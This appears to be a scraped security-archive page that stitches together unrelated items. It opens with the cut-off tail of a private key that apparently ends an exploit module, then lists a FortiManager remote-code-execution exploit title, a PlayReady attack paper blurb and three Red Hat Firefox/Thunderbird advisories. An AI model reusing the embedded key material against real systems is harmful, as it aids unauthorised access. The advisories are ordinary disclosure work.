KEY-----MIIEvwIBADANBgkqhkiG9w0BAQEFAASCBKkwggSlAgEAAoIBAQDHIBs0ZU03lYyHBPA+8+1Z6eiyg3BhOe1S+KrNXzsb06yto+71m1TB0rDqX/LWgAJueapqnkv/8KAiUKt7eZpqtTOjB5tp6JukPnTm3LH4Yni6yBcKfV9V7fWBykHeajkeT8rKzIRSnacDCX5pc7llnCFHopYHnD+nqvRkudILuJvtDStHdy07Jls9YyzQt5O+H2MGA7Gj54Zf7bMXKmVq2B1ByYR+XqfGAMROhKNiRuuwVziPyW8a1jxIfs0S6gO2a1ngT5dABCF0yvkiASU1tHaZ8RHBusAUEMQqfI2fkZWhaSowXWLnA1Uw7ZC2m73rTqwJ/po3EbrYOjR5abUhAgMBAAECggEAcIXaGa+tBN4DfUDzKf/ZflfJ4SaZWLfNPne6vTc1RbJGABGFNVFDggu3YZo6ta+8sAUcogc11zl4pCuF286Jzgb7WQMxdZW2bgfFM7g+8adjpdjv/EOAniRL+b37nt3TzSc154fOtojUGclBoAF/IMYroDlmIoLPDcZzOIAxC+GUBCkCh/a3AFnhkkym0IGx4i89ji+nxcY5vEqD4n4Q49gkebxjmTVBq7YEU2YwOsbT0BO9jmYKE0wumetNpYJsR2qVI7dUmJMNdcEah/A9ODqMM2BJUxovW8XgR9wOIXN23aWwmPeAtTnVhvBaHJL/ItGOGjmdcM1pwChowCWj4QKBgQD5EMo2A9+qeziSt3VenmD1o7zDyGAe0bGLN4rIou6I/Zz8p7ckRYIAw2HhmsE2C2ZF8OS9GWmsu23tnTBlDQTj1fSquw1cjLxUgwTkLUF7FTUBrxLstYSz1EJSzd8+V8mLI3bXriq8yFVK7z8yjFBB3BqkqUcBjIWFAMDvWoyJtQKBgQDMq15o9bhWuR7rGTvzhDiZvDNemTHHdRWz6cxb4d4TWsRsK73Bv1VFRg/SpDTg88kV2X8wqt7yfR2qhcyiAAFJq9pflG/rUSp6KvNbcXW7ys+x33x+MkZtbSh8TJ3SP9IoppawB/SP/p2YxkdgjPF/sllPEAkgHznWGwk5jxRxPQKBgQDQAKGfcqS8b6PTg7tVhddbzZ67sv/zPRSVO5F/9fJYHdWZe0eL1zC3CnUYQHHTfLmw93lQI4UJaI5pvrjH65OF4w0t+IE0JaSyv6i6FsF01UUrXtbjMMTemgm5tY0XN6FtvfRmM2IlvvjcV+njgSMVnYfytBxEwuJPLU3zlx9/cQKBgQDB2GEPugLAqI6fDoRYjNdqy/Q/WYrrJXrLrtkuAQvreuFkrj0IHuZtOQFNeNbYZC0E871iY8PLGTMayaTZnnWZyBmIwzcJQhOgJ8PbzOc8WMdD6a6oe4d2ppdcutgTRP0QIU/BI5e/NeEfzFPYH0Wvs0Sg/EgYU1rc7ThceqZa5QKBgQCf18PRZcm7hVbjOn9iBFpFMaECkVcf6YotgQuUKf6uGgF+/UOEl6rQXKcf1hYcSALViB6M9p5vd65FHq4eoDzQRBEPL86xtNfQvbaIqKTalFDv4ht7DlF38BQx7MAlJQwuljj1hrQd9Ho+VFDuLh1BvSCTWFh0WIUxOrNlmlg1Uw==-----END PRIVATE KEY-----"  endend

Fortinet FortiManager Unauthenticated Remote Code Execution

This paper provides an in-depth technical explanation, illustration, and verification of discovered attacks affecting PlayReady on Windows 10 / 11 x64 that pertain to Warbird deficiencies, content key sniffer operation, magic XOR keys discovery, white-box crypto attack, and complete client identity compromise attacks.

Microsoft Warbird and PMP Security Research

Red Hat Security Advisory 2024-10743-03 - An update for firefox is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions. Issues addressed include bypass, cross site scripting, and spoofing vulnerabilities.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_10743.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: firefox security updateAdvisory ID:        RHSA-2024:10743-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:10743Issue date:         2024-12-03Revision:           03CVE Names:          CVE-2024-11692====================================================================Summary: An update for firefox is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.Security Fix(es):* firefox: thunderbird: CSP Bypass and XSS Exposure via Web Compatibility Shims (CVE-2024-11694)* firefox: thunderbird: Unhandled Exception in Add-on Signature Verification (CVE-2024-11696)* firefox: thunderbird: Select list elements could be shown over another site (CVE-2024-11692)* firefox: thunderbird: Memory safety bugs fixed in Firefox 133, Thunderbird 133, Firefox ESR 128.5, and Thunderbird 128.5 (CVE-2024-11699)* firefox: thunderbird: URL Bar Spoofing via Manipulated Punycode and Whitespace Characters (CVE-2024-11695)* firefox: thunderbird: Improper Keypress Handling in Executable File Confirmation Dialog (CVE-2024-11697)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-11692References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2328941https://bugzilla.redhat.com/show_bug.cgi?id=2328943https://bugzilla.redhat.com/show_bug.cgi?id=2328946https://bugzilla.redhat.com/show_bug.cgi?id=2328947https://bugzilla.redhat.com/show_bug.cgi?id=2328948https://bugzilla.redhat.com/show_bug.cgi?id=2328950

Red Hat Security Advisory 2024-10743-03

Red Hat Security Advisory 2024-10734-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service. Issues addressed include bypass, cross site scripting, and spoofing vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_10734.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2024:10734-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:10734  
Issue date:         2024-12-03  
Revision:           03  
CVE Names:          CVE-2024-11159  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

Security Fix(es):

* thunderbird: Potential disclosure of plaintext in OpenPGP encrypted message (CVE-2024-11159)

* firefox: thunderbird: CSP Bypass and XSS Exposure via Web Compatibility Shims (CVE-2024-11694)

* firefox: thunderbird: Unhandled Exception in Add-on Signature Verification (CVE-2024-11696)

* firefox: thunderbird: Select list elements could be shown over another site (CVE-2024-11692)

* firefox: thunderbird: Memory safety bugs fixed in Firefox 133, Thunderbird 133, Firefox ESR 128.5, and Thunderbird 128.5 (CVE-2024-11699)

* firefox: thunderbird: URL Bar Spoofing via Manipulated Punycode and Whitespace Characters (CVE-2024-11695)

* firefox: thunderbird: Improper Keypress Handling in Executable File Confirmation Dialog (CVE-2024-11697)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-11159

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2325896  
https://bugzilla.redhat.com/show_bug.cgi?id=2328941  
https://bugzilla.redhat.com/show_bug.cgi?id=2328943  
https://bugzilla.redhat.com/show_bug.cgi?id=2328946  
https://bugzilla.redhat.com/show_bug.cgi?id=2328947  
https://bugzilla.redhat.com/show_bug.cgi?id=2328948  
https://bugzilla.redhat.com/show_bug.cgi?id=2328950

Red Hat Security Advisory 2024-10734-03

Red Hat Security Advisory 2024-10733-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service. Issues addressed include bypass, cross site scripting, and spoofing vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_10733.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2024:10733-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:10733  
Issue date:         2024-12-03  
Revision:           03  
CVE Names:          CVE-2024-11159  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

Security Fix(es):

* thunderbird: Potential disclosure of plaintext in OpenPGP encrypted message (CVE-2024-11159)

* firefox: thunderbird: CSP Bypass and XSS Exposure via Web Compatibility Shims (CVE-2024-11694)

* firefox: thunderbird: Unhandled Exception in Add-on Signature Verification (CVE-2024-11696)

* firefox: thunderbird: Select list elements could be shown over another site (CVE-2024-11692)

* firefox: thunderbird: Memory safety bugs fixed in Firefox 133, Thunderbird 133, Firefox ESR 128.5, and Thunderbird 128.5 (CVE-2024-11699)

* firefox: thunderbird: URL Bar Spoofing via Manipulated Punycode and Whitespace Characters (CVE-2024-11695)

* firefox: thunderbird: Improper Keypress Handling in Executable File Confirmation Dialog (CVE-2024-11697)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-11159

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2325896  
https://bugzilla.redhat.com/show_bug.cgi?id=2328941  
https://bugzilla.redhat.com/show_bug.cgi?id=2328943  
https://bugzilla.redhat.com/show_bug.cgi?id=2328946  
https://bugzilla.redhat.com/show_bug.cgi?id=2328947  
https://bugzilla.redhat.com/show_bug.cgi?id=2328948  
https://bugzilla.redhat.com/show_bug.cgi?id=2328950

Tag

#sap